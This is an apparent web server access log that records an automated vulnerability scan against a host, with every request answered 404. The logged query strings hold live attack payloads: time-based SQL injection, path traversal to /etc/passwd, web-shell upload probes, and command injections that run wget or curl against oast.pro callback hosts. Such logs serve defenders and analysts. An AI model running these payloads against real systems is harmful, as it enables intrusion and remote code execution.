8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.17 - 404 7 0 23 2024-12-10 07:44:54 103.153.214.94 GET /wp-content/plugins/wp-statistics/readme.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 56 2024-12-10 07:44:57 103.153.214.94 GET /wp-admin/admin.php page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.5+Safari/605.1.15 - 404 7 0 23 2024-12-10 07:45:43 103.153.214.94 POST /wp-admin/admin.php page=contest-gallery/index.php&users_management=true&option_id=1 8172 - 115.146.123.211 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 - 404 7 0 26 2024-12-10 07:45:43 103.153.214.94 GET /wp-admin/options.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.23 something 404 7 0 27 2024-12-10 07:46:19 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.24 - 404 7 0 27 2024-12-10 07:46:21 103.153.214.94 GET /wp-content/uploads/workreap-temp/2q0PiOIDZGT3F6P0cdw1r5h2DH5.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_2_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 26 2024-12-10 07:48:12 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 24 2024-12-10 07:50:17 103.153.214.94 POST /wp-admin/admin-ajax.php action=rtec_send_unregister_link 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13.0)+AppleWebKit/617.28+(KHTML,+like+Gecko)+Version/17.0+Safari/617.28 - 404 7 0 28 2024-12-10 07:50:28 103.153.214.94 GET /wp-admin/admin-ajax.php action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 23 2024-12-10 07:56:24 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/618.6+(KHTML,+like+Gecko)+Version/17.2+Safari/618.6 - 404 7 0 28 2024-12-10 07:57:32 103.153.214.94 POST /run - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/618.5.10+(KHTML,+like+Gecko)+Version/17.5+Safari/618.5.10 - 404 7 0 26 2024-12-10 08:02:37 103.153.214.94 POST /druid/indexer/v1/sampler - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 27 2024-12-10 08:04:25 103.153.214.94 POST /AurallRECMonitor/services/svc-login.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 32 2024-12-10 08:05:34 103.153.214.94 GET /wp-content/plugins/pie-register/readme.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.24 - 404 7 0 29 2024-12-10 08:05:37 103.153.214.94 POST /login/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 24 2024-12-10 08:05:40 103.153.214.94 GET /wp-admin/profile.php - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 08:06:56 103.153.214.94 GET /data/settings/settings.xml - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-10 08:07:43 103.153.214.94 POST /contactus.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 25 2024-12-10 08:07:43 103.153.214.94 POST /admin/ - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 27 2024-12-10 08:07:56 103.153.214.94 POST /pages/createpage-entervariables.action SpaceKey=x 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 27 2024-12-10 08:07:56 103.153.214.94 POST /wiki/pages/createpage-entervariables.action - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.2.27 - 404 7 0 25 2024-12-10 08:07:56 103.153.214.94 POST /pages/templates2/viewpagetemplate.action - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 25 2024-12-10 08:07:56 103.153.214.94 POST /confluence/pages/createpage-entervariables.action SpaceKey=x 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 08:07:56 103.153.214.94 POST /pages/doenterpagevariables.action - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 25 2024-12-10 08:07:56 103.153.214.94 POST /confluence/pages/createpage-entervariables.action - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 26 2024-12-10 08:07:56 103.153.214.94 POST /template/custom/content-editor - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 25 2024-12-10 08:07:56 103.153.214.94 POST /templates/editor-preload-container - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 08:07:56 103.153.214.94 POST /pages/createpage.action spaceKey=myproj 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.21 - 404 7 0 24 2024-12-10 08:07:56 103.153.214.94 POST /users/user-dark-features - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 24 2024-12-10 08:07:56 103.153.214.94 POST /pages/createpage-entervariables.action - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 25 2024-12-10 08:07:56 103.153.214.94 POST /wiki/pages/createpage-entervariables.action SpaceKey=x 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36+Edge/16.16299 - 404 7 0 26 2024-12-10 08:07:56 103.153.214.94 POST /pages/createpage-entervariables.action - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.21 - 404 7 0 26 2024-12-10 08:08:19 103.153.214.94 GET /nagiosxi/login.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 25 2024-12-10 08:08:53 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.61+Safari/537.36 - 404 7 0 25 2024-12-10 08:08:54 103.153.214.94 GET /owa/auth/x.js - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 08:08:56 103.153.214.94 POST /contactus.php - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 08:09:33 103.153.214.94 GET / rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 24 2024-12-10 08:09:38 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Mobile/15E148+Safari/604.1 - 404 7 0 27 2024-12-10 08:10:25 103.153.214.94 GET /nagiosxi/login.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 23 2024-12-10 08:10:25 103.153.214.94 GET /nagiosxi/login.php - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 08:12:39 103.153.214.94 POST /contactus.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 27 2024-12-10 08:13:13 103.153.214.94 POST /contactus.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Tokai/21.1.294403+Version/17.2+Safari/605.1.15 - 404 7 0 23 2024-12-10 08:16:11 103.153.214.94 POST /api/snapshots - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Mobile/15E148+Safari/604.1 - 404 7 0 29 2024-12-10 08:18:39 103.153.214.94 GET / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13_7_3;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.7+Safari/605.1.15 - 404 7 0 27 2024-12-10 08:21:36 103.153.214.94 POST /lumis/portal/controller/xml/PageControllerXml.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 44 2024-12-10 08:23:04 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/2q0PhzaxejmGZki2V0jwKN4qodM.php - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 08:23:06 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/barcode.php text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2q0PhzaxejmGZki2V0jwKN4qodM.php 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 26 2024-12-10 08:23:08 103.153.214.94 POST /wp-content/plugins/wpcargo/includes/2q0PhzaxejmGZki2V0jwKN4qodM.php 1=var_dump 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 08:23:14 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 25 2024-12-10 08:25:48 103.153.214.94 GET /assets/app/something/services/AppModule.class/ - 8172 - 115.146.123.211 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 29 2024-12-10 08:25:48 103.153.214.94 GET /solr/admin/cores wt=json 8172 - 115.146.123.211 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 26 2024-12-10 08:29:01 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/106.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 08:29:01 103.153.214.94 POST /webtools/control/SOAPService - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.19.3+(KHTML,+like+Gecko)+Version/17.6.11+Safari/616.19.3 - 404 7 0 25 2024-12-10 08:29:35 103.153.214.94 POST /HandleEvent - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Safari/605.1.15 - 404 7 0 29 2024-12-10 08:29:41 103.153.214.94 POST /index.php - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 33 2024-12-10 08:30:54 103.153.214.94 POST /goform/setmac - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:80.0)+Gecko/20100101+Firefox/80.0 https://bcvt.kontum.gov.vn:8172/index.htmlr 404 7 0 27 2024-12-10 08:30:55 103.153.214.94 GET /index.php fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 25 2024-12-10 08:32:20 103.153.214.94 POST /tools.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 https://bcvt.kontum.gov.vn:8172/tools.cgi 404 7 0 26 2024-12-10 08:32:23 103.153.214.94 POST /tools.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.25 https://bcvt.kontum.gov.vn:8172/tools.cgi 404 7 0 24 2024-12-10 08:32:28 103.153.214.94 GET /appGet.cgi hook=get_cfg_clientlist() 8172 - 115.146.123.211 asusrouter-- https://bcvt.kontum.gov.vn:8172 404 7 0 23 2024-12-10 08:32:29 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 24 2024-12-10 08:36:17 103.153.214.94 GET /status.htm - 8172 - 115.146.123.211 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 26 2024-12-10 08:36:17 103.153.214.94 POST /RPC2_Login - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 https://bcvt.kontum.gov.vn:8172 404 7 0 25 2024-12-10 08:36:23 103.153.214.94 GET /search.php search=%22;wget+http%3A%2F%2Fctbq6epdf88k4t1c60lgmoq5cxdissk4o.oast.pro%27;%22 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.25 - 404 7 0 24 2024-12-10 08:36:30 103.153.214.94 PATCH /redfish/v1/SessionService/ResetPassword/1/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Mobile/15E148+Safari/604.1 - 404 7 0 29 2024-12-10 08:36:33 103.153.214.94 POST /redfish/v1/SessionService/Sessions/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 23 2024-12-10 08:36:49 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 25 2024-12-10 08:36:51 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 8172 - 115.146.123.211 Nacos-Server - 404 7 0 22 2024-12-10 08:38:36 103.153.214.94 GET /uapi-cgi/certmngr.cgi action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ctbq6epdf88k4t1c60lgp14t34idma5xw.oast.pro)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.9.25 - 404 7 0 27 2024-12-10 08:38:36 103.153.214.94 POST /tc.CBS.Appl/tcspseudo - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 28 2024-12-10 08:39:26 103.153.214.94 GET /admin/index.php p=ajax-ops&op=elfinder&cmd=mkfile&name=2q0PiQhOC0qI0Wc6wgB2CeRQ3Fy.php&target=l1_Lw 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 26 2024-12-10 08:45:08 103.153.214.94 POST / Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 36 2024-12-10 08:46:46 103.153.214.94 POST /goform/formWsc - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 27 2024-12-10 08:47:28 103.153.214.94 POST /cgi/networkDiag.cgi - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.20 - 404 7 0 23 2024-12-10 08:47:30 103.153.214.94 GET / action=command&command=set_city_timezone&value=$(wget%20http://ctbq6epdf88k4t1c60lg33syx9b8dnodj.oast.pro)) 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.6)+AppleWebKit/616.20+(KHTML,+like+Gecko)+Version/17.1.83+Safari/616.20 - 404 7 0 24 2024-12-10 08:47:33 103.153.214.94 GET /dashboardUser - 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-10 08:50:02 103.153.214.94 POST /Config/SaveUploadedHotspotLogoFile - 8172 - 115.146.123.211 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 https://bcvt.kontum.gov.vn:8172 404 7 0 34 2024-12-10 08:50:04 103.153.214.94 GET /Assets/temp/hotspot/img/logohotspot.txt - 8172 - 115.146.123.211 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 27 2024-12-10 08:50:07 103.153.214.94 POST /home/download - 8172 - 115.146.123.211 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 23 2024-12-10 08:50:27 103.153.214.94 POST /wsman - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 25 2024-12-10 08:54:18 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 29 2024-12-10 08:54:18 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 25 2024-12-10 08:54:18 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9.2.6)+Gecko/20100628+Ubuntu/10.04+(lucid)+Firefox/3.6.6 - 404 7 0 22 2024-12-10 08:56:03 103.153.214.94 GET /module/ph_simpleblog/list sb_category=')%20OR%20true--%20- 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_12_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)++++Chrome/55.0.2883.95+Safari/537.36 - 404 7 0 28 2024-12-10 08:56:03 103.153.214.94 PUT /SDK/webLanguage - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 27 2024-12-10 08:56:03 103.153.214.94 POST /ajaxPages/writeBrowseFilePathAjax.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.24 - 404 7 0 23 2024-12-10 08:56:06 103.153.214.94 GET /x - 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/88.0.4324.182+Safari/537.36 - 404 7 0 23 2024-12-10 08:56:06 103.153.214.94 GET /module/ph_simpleblog/list sb_category=')%20AND%20false--%20- 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.18 - 404 7 0 22 2024-12-10 08:56:06 103.153.214.94 GET /2q0PiOYo8iO4TAMgCL6GRyPQMBi.php cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//ctbq6epdf88k4t1c60lgygn7asm49xbfu.oast.pro+-H+'User-Agent%3a+HHjtDL'")}' 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 22 2024-12-10 08:56:15 103.153.214.94 POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/116.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 08:56:16 103.153.214.94 POST / - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 27 2024-12-10 08:56:20 103.153.214.94 GET /login/ - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+x86_64;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 27 2024-12-10 09:00:14 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 https://bcvt.kontum.gov.vn:8172 404 7 0 32 2024-12-10 09:00:18 103.153.214.94 POST /wp-login.php - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 24 2024-12-10 09:00:22 103.153.214.94 GET /wp-admin/ - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.0)+AppleWebKit/616.3+(KHTML,+like+Gecko)+Version/17.5.22+Safari/616.3 - 404 7 0 45 2024-12-10 09:01:31 103.153.214.94 GET /tree action=get 8172 - 115.146.123.211 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/119.0 - 404 7 0 26 2024-12-10 09:01:33 103.153.214.94 POST /geoserver/TestWfsPost - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 22 2024-12-10 09:02:59 103.153.214.94 POST /api/v1/login/oauth2/auth - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4.11.12 - 404 7 0 36 2024-12-10 09:03:42 103.153.214.94 POST /cobbler_api - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Safari/605.1.15 - 404 7 0 26 2024-12-10 09:05:03 103.153.214.94 POST /viewlog.jsp - 8172 - 115.146.123.211 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 27 2024-12-10 09:05:04 103.153.214.94 GET /fmangersub cpath=../../../../../../../etc/passwd 8172 - 115.146.123.211 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 25 2024-12-10 09:06:47 103.153.214.94 POST /delete_cart_goods.php - 8172 - 115.146.123.211 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 29 2024-12-10 09:08:09 103.153.214.94 POST /controller/origemdb.php idselorigem=ATIVOS 8172 - 115.146.123.211 Mozilla/5.0+(CentOS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 28 2024-12-10 09:08:13 103.153.214.94 POST /controller/login.php acao=autenticar 8172 - 115.146.123.211 